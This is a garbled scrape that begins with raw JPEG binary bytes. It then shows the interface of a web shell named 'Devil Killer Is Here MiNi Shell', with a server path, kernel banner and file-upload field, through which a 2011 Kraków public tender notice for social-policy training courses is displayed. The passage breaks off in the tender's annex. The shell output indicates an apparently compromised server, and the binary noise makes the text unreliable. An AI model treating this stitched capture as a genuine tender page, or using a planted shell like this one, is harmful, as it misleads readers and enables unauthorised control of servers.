JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110422/123095-N-2011.html

<p class="kh_header"><b>Kraków: Usługi szkoleniowe z zakresu polityki społecznej realizowane w ramach działań własnych Regionalnego Ośrodka Polityki Społecznej w Krakowie</b><br>
<b>Numer ogłoszenia: 123095 - 2011; data zamieszczenia: 22.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej , ul. Piastowska 32, 30-070 Kraków, woj. małopolskie, tel. 0-12 422 06 36, faks 0-12 422 06 36 w. 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rops.krakow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe z zakresu polityki społecznej realizowane w ramach działań własnych Regionalnego Ośrodka Polityki Społecznej w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia o wartości zamówienia nie przekraczającej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. 
Przedmiot zamówienia obejmuje: 
- przeprowadzenie szkoleń dla wskazanych grup uczestników rekrutowanych przez Zamawiającego, 
- opracowanie jednego kompletu materiałów szkoleniowych dla każdej części szkoleniowej oraz przekazanie go Zamawiającemu w celu jego powielenia dla uczestników szkoleń. 

Warunki realizacji zamówienia: 
Zamawiający zobowiązuje się do zapewnienia sali wykładowej, sprzętu multimedialnego oraz przygotowania i wystawienia dla uczestników szkoleń zaświadczeń o udziale w szkoleniu. 
Zamawiający wymaga, aby: 
- usługi szkolenia będące przedmiotem zamówienia były wykonywane w dniach roboczych, od poniedziałku do piątku w przedziale godzin od 9.00 do 17.00, 
- szkolenia odbywały się w zależności od potrzeb: 
-na terenie województwa małopolskiego, 
-na terenie Krakowa. 

Miejsce wykonania umowy w zakresie realizacji poszczególnych usług szkolenia objętych daną częścią zamówienia zostanie wskazane przez Zamawiającego nie później niż 14 dni przed dniem wykonania umowy.
Zamawiający wymaga, aby szkolenia obejmowały następujące bloki tematyczne:
Część zamówienia nr I
-Szkolenie nr 1:
 Opieka rodzicielska w kontekście zmian w Kodeksie Rodzinnym i Opiekuńczym z dnia 13 czerwca, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: II-III tydzień maja i I tydzień czerwca 2011 r.

-Szkolenie nr 2:
Praca z rodziną biologiczną dziecka umieszczonego w placówce opiekuńczo-wychowawczej, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy. 
Szkolenia będą przeprowadzone w terminach: II-III tydzień maja i I tydzień czerwca 2011 r.

-Szkolenie nr 3:
Doskonalenie procesu komunikacji wychowawcy z wychowankiem, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: II-III tydzień maja  i II tydzień czerwca 2011 r.

-Szkolenie nr 4:
Zapobieganie uzależnieniom - doskonalenie warsztatu pracy z wychowankiem, w ramach którego Wykonawca przeprowadzi jedno szkolenie dla 20 osób w grupie, w cyklu dwudniowym obejmującym 16 godz. szkoleniowych. 
Szkolenie będzie przeprowadzone w terminie: III-IV tydzień maja 2011 r.

-Szkolenie nr 5:
Proces grupowy - doskonalenie warsztatu pracy z wychowankiem, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: III-IV tydzień maja i III tydzień czerwca 2011 r.

-Szkolenie nr 6:
Jak pracować z osobą starszą?, w ramach którego Wykonawca przeprowadzi dwa szkolenia, łącznie dla 36 osób, po 18 osób w grupie, w cyklu dwudniowym, obejmującym po 16 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: II-IV  tydzień maja 2011 r.

-Szkolenie nr 7:
Reorganizacja DPS w oparciu o model duński, w ramach którego Wykonawca przeszkoli: 
3 grupy w trzech domach pomocy społecznej na terenie województwa małopolskiego, 
w każdej z grup po 15 godzin szkoleniowych. Szkolenia będą przeprowadzone 
w terminach: od maja do listopada 2011 r. (w terminach ustalonych z Dyrektorami placówek wskazanych przez Zamawiającego, z zachowaniem zasad określonych w § 3 umowy, której wzór stanowi Część II SIWZ).

Część zamówienia nr II

-Szkolenie nr 8:
Budowanie współpracy interdyscyplinarnej przeciw przemocy, w ramach którego Wykonawca przeprowadzi dwa szkolenia, łącznie dla 40 osób, po 20 osób w grupie, w cyklu dwudniowym, obejmującym po 16 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: IV i V tydzień maja 2011 r.

-Szkolenie nr 9:
Prowadzenie grupy wsparcia dla osób doświadczających przemocy, w ramach którego Wykonawca przeprowadzi jedno szkolenie dla 20 osób, w cyklu dwudniowym obejmującym 16 godz. szkoleniowych.
Szkolenia będą przeprowadzone w terminach: V tydzień czerwca i I tydzień lipca 2011 r.

-Szkolenie nr 10:
Podejście skoncentrowane na rozwiązaniach w pomocy społecznej, w ramach którego Wykonawca przeprowadzi jedno szkolenie dla 18 osób, w cyklu sześciodniowym obejmującym 36 godz. szkoleniowych.
Szkolenie będzie przeprowadzone w terminach: I i II tydzień czerwca 2011 r. 

Część zamówienia nr III

-Szkolenie nr 11:
Wolontariat w pracy socjalnej - możliwości wolontariatu w działaniach ośrodka pomocy społecznej, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: IV tydzień maja, III tydzień czerwca 2011 r.

-Szkolenie nr 12:
Wolontariat w jednostkach pomocy społecznej, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: V tydzień czerwca 2011 r.

Szczegółowy opis przedmiotu zamówienia znajduje się w Części III SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w niniejszym postępowaniu nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy w tym w szczególności: w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy) w tym okresie - wykonał (a w przypadku świadczeń okresowych lub ciągłych - również wykonuje ) usługi polegające na przeprowadzeniu co najmniej 2 szkoleń dla co najmniej 15 osób każde, odpowiadających swoim rodzajem (tematyką szkolenia) dowolnemu szkoleniu objętemu daną częścią zamówienia. Ocena spełniania przez wykonawców warunków udziału w postępowaniu - o których mowa powyżej zostanie dokonana w oparciu o dokumenty wymienione w pkt III.4.1) ogłoszenia. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy, w tym w szczególności dysponują co najmniej jedną osobą (trenerem), która posiada wyższe wykształcenie oraz doświadczenie w prowadzeniu szkoleń w postaci przeprowadzenia szkoleń dla co najmniej 15 osób każde, odpowiadających swoim rodzajem (tematyką szkolenia) poszczególnym szkoleniom objętym daną częścią zamówienia (jeżeli część zamówienia obejmuje kilka szkoleń, Wykonawca powinien wykazać, że w odniesieniu do każdego z tych szkoleń będzie dysponował przynajmniej jedną osobą, która przeprowadziła przynajmniej jedno szkolenie dla co najmniej 15 osób, odpowiadające swoim rodzajem (tematyką szkolenia) danemu szkoleniu objętemu tą częścią zamówienia). Ocena spełniania przez wykonawców warunków udziału w postępowaniu - o których mowa powyżej zostanie dokonana odpowiednio w oparciu o dokumenty wymienione w punktach III.4.1) ogłoszenia. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy Pzp, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia-jeżeli dotyczy. 2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz Oferty według wzoru stanowiącego załącznik nr 1 do SIWZ. 3. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie w przeprowadzaniu szkoleń - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. W przypadku zmiany stawki podatku od towarów i usług w trakcie obowiązywania niniejszej umowy, kwota brutto określona w ust. 1 nie ulegnie zmianie, a Strony zawrą aneks do niniejszej umowy stosownie korygujący kwotę netto oraz kwotę podatku od towarów i usług.II. Poza przypadkami wskazanymi w  umowie oraz w art. 144 ust. 1 ustawy Prawo zamówień publicznych, zmiana postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jest dopuszczalna w szczególnie uzasadnionych przypadkach, na zasadach wskazanych w ust. 2-8. 
2. Zmiana może być wprowadzona jedną z następujących metod:
1)Wykonawca może zaproponować zmianę przez złożenie pisemnej propozycji zmiany, która zdaniem Wykonawcy, w razie przyjęcia, pozwoli skrócić okres realizacji umowy lub obniży koszty realizacji umowy lub w inny sposób będzie korzystna dla Zamawiającego, 
2)Zamawiający może przedłożyć propozycję zmiany, jeżeli jej wprowadzenie jest konieczne dla prawidłowej realizacji zadania, i która, w razie przyjęcia, pozwoli skrócić okres realizacji umowy lub obniży koszty realizacji umowy lub w inny sposób będzie korzystna dla Zamawiającego lub jeżeli konieczność jej wprowadzenia wynika ze zmiany prawa lub z innych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
3.Każda ze stron przedkładając drugiej stronie propozycję zmiany, spełniającą wymogi określone w ust. 2, wraz z tą propozycją przedłoży: 
1)opis proponowanej zmiany,
2)zakres proponowanej zmiany, 
3)szacunki, czy i w jaki sposób zakładana zmiana wpłynie na termin realizacji Przedmiotu umowy, oraz
4)szacunki dotyczące wpływu zmiany na wynagrodzenie należne Wykonawcy wraz z uzasadnieniem. 
4.Po otrzymaniu propozycji, Wykonawca albo Zamawiający (w zależności od przypadku) w terminie 3 dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany, bądź w tym terminie wystąpi do strony występującej z propozycją zmiany, przesyłając zmodyfikowaną propozycję zmiany, spełniającą wymogi opisane w ust. 3. 
5.W przypadku upływu terminu podanego w ust. 4, traktuje się, iż propozycja wprowadzenia zmiany została odrzucona.
6.Do przesłanej zmodyfikowanej propozycji zmiany mają zastosowanie postanowienia ust. 4-5.
7.Każda zmiana do umowy wymaga formy pisemnej. 
8.Zmiana umowy dokonana z naruszeniem postanowień ust. 1-7 jest nieważna.
9.W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tychże okolicznościach. 
10.W przypadku, o którym mowa w ust. 9, Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu rzeczywistego wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> REGIONALNY OŚRODEK POLITYKI SPOŁECZNEJ W KRAKOWIE, ul. Piastowska 32, 30-070 Kraków..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2011 godzina 12:00, miejsce: REGIONALNY OŚRODEK POLITYKI SPOŁECZNEJ W KRAKOWIE, ul. Piastowska 32, 30-070 Kraków, w sekretariacie (pok. nr 7, I piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Uzupełnienie do pkt. IV.2.1): Punkty za kryterium Doświadczenie w przeprowadzaniu szkoleń zostaną przyznane w skali punktowej 0 - 40 punktów, na podstawie przedstawionego przez Wykonawcę wykazu wykonanych (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych) w okresie ostatnich 3 lat przed dniem składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), usług dla potrzeb oceny w ramach kryterium Doświadczenie w przeprowadzaniu szkoleń, wg wzoru stanowiącego odpowiednio załącznik nr 6a do Części I SIWZ dla części I zamówienia, załącznik nr 6b do Części I SIWZ dla części II zamówienia, załącznik nr 6c do Części I SIWZ dla części III zamówienia, w oparciu o następujące elementy ( w układzie Ilość szkoleń dla co najmniej 15 osób odpowiadających swoim rodzajem [tematyką szkolenia] dowolnym szkoleniom objętym daną częścią zamówienia- punkty):1 - 2 szkolenia	5 pkt;
3 - 4 szkoleń	10 pkt;
5 - 6 szkoleń	15 pkt;
7 - 8 szkoleń	20 pkt;
9 - 10 szkoleń	25 pkt;
11 - 12 szkoleń 	30 pkt;
13 - 14 szkoleń	35 pkt;
15 i więcej szkoleń	40 pkt..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga, aby szkolenia obejmowały następujące bloki tematyczne:
Szkolenie nr 1:
Opieka rodzicielska w kontekście zmian w Kodeksie Rodzinnym i Opiekuńczym z dnia 13 czerwca, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: II-III tydzień maja i I tydzień czerwca 2011 r.

Szkolenie nr 2:
Praca z rodziną biologiczną dziecka umieszczonego w placówce opiekuńczo-wychowawczej, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy. 
Szkolenia będą przeprowadzone w terminach: II-III tydzień maja i I tydzień czerwca 2011 r.

Szkolenie nr 3:
Doskonalenie procesu komunikacji wychowawcy z wychowankiem, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: II-III tydzień maja  i II tydzień czerwca 2011 r.

Szkolenie nr 4:
Zapobieganie uzależnieniom - doskonalenie warsztatu pracy z wychowankiem, w ramach którego Wykonawca przeprowadzi jedno szkolenie dla 20 osób w grupie, w cyklu dwudniowym obejmującym 16 godz. szkoleniowych. 
Szkolenie będzie przeprowadzone w terminie: III-IV tydzień maja 2011 r.

Szkolenie nr 5:
Proces grupowy - doskonalenie warsztatu pracy z wychowankiem, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: III-IV tydzień maja i III tydzień czerwca 2011 r.

Szkolenie nr 6:
Jak pracować z osobą starszą?, w ramach którego Wykonawca przeprowadzi dwa szkolenia, łącznie dla 36 osób, po 18 osób w grupie, w cyklu dwudniowym, obejmującym po 16 godz. szkoleniowych dla każdej grupy.
